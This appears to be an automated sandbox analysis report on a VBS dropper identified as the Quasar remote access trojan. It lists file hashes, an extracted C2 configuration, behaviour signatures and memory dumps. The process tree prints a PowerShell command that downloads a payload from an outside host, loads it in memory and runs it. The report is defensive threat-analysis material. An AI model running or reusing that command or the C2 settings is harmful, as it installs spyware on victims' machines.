Overview

overview

10

Static

static

5c395df95b...00.vbs

windows10_x64

10

Analysis

  • max time kernel
    299s
  • max time network
    302s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    17-10-2021 07:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5c395df95b067f10c115f92e193d7f61bc6ce05eefb20bfc86aac86f278e0600.vbs

  • Size

    1KB

  • MD5

    010eb448243fbab8334a1c528ec2e356

  • SHA1

    35c7cb4272dd30c97711284673b60e9bf8aa105e

  • SHA256

    5c395df95b067f10c115f92e193d7f61bc6ce05eefb20bfc86aac86f278e0600

  • SHA512

    846869584bd44dfe8cbc96bb4e6a32e3a317a027646e4715253c226147941c1f934d0927e6a92262717a07cb77aa76e5c20721c72702cc4ded98523c954ce127

Score
10/10
quasar8spywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

8

C2

3.36.121.136:4782

Mutex

QSR_MUTEX_2buErdxrYVW8JvhTM4

Attributes
  • encryption_key

    HHPAsaGEK7mx9XJmMzI4

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    10

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar Payload 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops startup file 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5c395df95b067f10c115f92e193d7f61bc6ce05eefb20bfc86aac86f278e0600.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iwr -OutFile 'C:\Users\Public\Documents\VDO.html' -Uri 'https://sxom.000webhostapp.com/VDO.html' ;$b = [System.IO.File]::ReadAllBytes('C:\Users\Public\Documents\VDO.html');[System.Reflection.Assembly]::Load($b);[VDO.UIK]::Exe();
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3172
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        3⤵
          PID:768
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
          3⤵
            PID:2836
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3584

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/3172-132-0x000002478FD90000-0x000002478FD92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-124-0x000002478FD90000-0x000002478FD92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-117-0x000002478FD90000-0x000002478FD92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-118-0x000002478FD90000-0x000002478FD92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-119-0x000002478FD90000-0x000002478FD92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-120-0x00000247900A0000-0x00000247900A1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3172-121-0x000002478FD90000-0x000002478FD92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-122-0x000002478FD90000-0x000002478FD92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-123-0x00000247A8700000-0x00000247A8701000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3172-142-0x000002478FD90000-0x000002478FD92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-128-0x000002478FD90000-0x000002478FD92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-129-0x00000247A85F0000-0x00000247A85F2000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-130-0x00000247A85F3000-0x00000247A85F5000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-116-0x000002478FD90000-0x000002478FD92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-131-0x00000247A85F6000-0x00000247A85F8000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-134-0x000002478FD90000-0x000002478FD92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-135-0x00000247A8550000-0x00000247A85AA000-memory.dmp
        Filesize

        360KB

        Download
      • memory/3172-136-0x000002478FD90000-0x000002478FD92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3172-115-0x0000000000000000-mapping.dmp
        Download
      • memory/3584-149-0x00000000065F0000-0x00000000065F1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3584-141-0x000000000045819E-mapping.dmp
        Download
      • memory/3584-145-0x0000000005CF0000-0x0000000005CF1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3584-146-0x0000000005890000-0x0000000005891000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3584-147-0x00000000057F0000-0x0000000005CEE000-memory.dmp
        Filesize

        5.0MB

        Download
      • memory/3584-148-0x0000000005A50000-0x0000000005A51000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3584-140-0x0000000000400000-0x000000000045E000-memory.dmp
        Filesize

        376KB

        Download
      • memory/3584-150-0x00000000068D0000-0x00000000068D1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3584-151-0x0000000006C40000-0x0000000006C41000-memory.dmp
        Filesize

        4KB

        Download